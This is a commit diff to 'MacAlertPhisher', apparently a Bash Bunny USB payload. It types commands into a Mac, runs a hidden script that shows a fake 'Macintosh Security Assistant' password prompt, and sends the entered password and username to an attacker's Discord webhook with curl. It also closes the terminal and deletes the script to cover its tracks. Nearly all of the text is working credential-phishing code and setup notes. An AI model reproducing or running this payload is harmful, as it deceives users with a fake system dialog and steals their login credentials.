Add alert title + optional internet check

payloads/library/phishing/MacAlertPhisher/README.md

@@ -8,7 +8,7 @@
 Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.
 
 ### Setup
-Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file.
+Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. Optional, you can change the other variables at the top of the `script.sh` file to your needs.
 
 ### Status
 | LED | State |
@@ -17,4 +17,4 @@ Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/ar
 | Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine |
 | Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) |
 
-*Average runtime: 26 seconds*
+*Average runtime: 27 seconds*

payloads/library/phishing/MacAlertPhisher/payload.txt

@@ -25,11 +25,12 @@ QUACK STRING "diskutil eject /Volumes/BashBunny/"
 QUACK ENTER
 QUACK STRING "chmod +x /tmp/script.sh && nohup bash /tmp/script.sh &> /dev/null &"
 QUACK ENTER
+QUACK DELAY 2000
 QUACK GUI SPACE
-QUACK DELAY 1500
+QUACK DELAY 1000
 QUACK STRING terminal
 QUACK ENTER
-QUACK DELAY 500
+QUACK DELAY 1000
 QUACK STRING "killall Terminal"
 QUACK ENTER
 

payloads/library/phishing/MacAlertPhisher/script.sh

@@ -2,32 +2,75 @@
 
 # Discord Webhook Link (NEEDED)
 discord=""
+# The alert's title
+title="Macintosh Security Assistant"
 # The alert's text
-dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are a human."
+dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are the owner."
-# The alert's icon (for ex. "stop", "caution", "note" or a custom path to an icon)
+# The alert's icon (for ex. "stop", "caution", "note")
 icon="stop"
 # A custom application, that should open the alert (for ex. "Finder")
 app=""
-# Base64 encode the entered string to prevent an injection/syntax error
+# Base64 encode the entered string to prevent an injection/error
 base64=false
+# Check if an internet connection is available and wait until it is before trying to send the Discord message
+internet_check=false
 
 #### The main script
 
-if [[ ${app} != "" ]]; then
+date=$(date)
-	pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer')
+user=$(whoami)
-elif [[ ${app} == "" ]]; then
-	pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer')
-fi
 
+if [[ ${app} != "" ]]; then
+	pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer')
+elif [[ ${app} == "" ]]; then
+	pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer')
+fi
 
 pwd=${pwd#*"button returned:Continue, text returned:"}
 
 if [[ ${base64} == true ]]; then
 	pwd=$(echo $pwd | base64)
-	curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something (Base64 encoded): ${pwd}\"}" ${discord}
+	enc_txt="(Base64)"
 else
-	curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something: ${pwd}\"}" ${discord}
+	enc_txt=""
 fi
 
+# Discord Embed Message
+embed="{
+  \"embeds\": [
+    {
+      \"color\": 14427938,
+      \"footer\": {
+        \"text\": \"Captured: ${date}\"
+      },
+      \"author\": {
+        \"name\": \"Bash Bunny • MacAlertPhisher\",
+        \"url\": \"https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/phishing/MacAlertPhisher\",
+        \"icon_url\": \"https://www.gitbook.com/cdn-cgi/image/width=40,dpr=2,height=40,fit=contain,format=auto/https%3A%2F%2F3076592524-files.gitbook.io%2F~%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FnxJgJ9UdPfrcuL1U8DpL%252Ficon%252F1UaEKnAJMPWZDBVtU8Il%252Fbb.png%3Falt%3Dmedia%26token%3D43bf1669-462c-4295-b30b-94c295470371\"
+      },
+      \"fields\": [
+        {
+          \"name\": \"Current User\",
+          \"value\": \"${user}\",
+          \"inline\": true
+        },
+        {
+          \"name\": \"Entered Credentials ${enc_txt}\",
+          \"value\": \"${pwd}\",
+          \"inline\": true
+        }
+      ]
+    }
+  ]
+}"
+
+if [[ ${internet_check} == true ]]; then
+	while [[ $(ping -c1 google.com | grep -c "1 packets received") != "1" ]]; do
+		sleep 5
+	done
+fi
+
+curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "${embed}" ${discord}
+
 # Self destruct
 rm /tmp/script.sh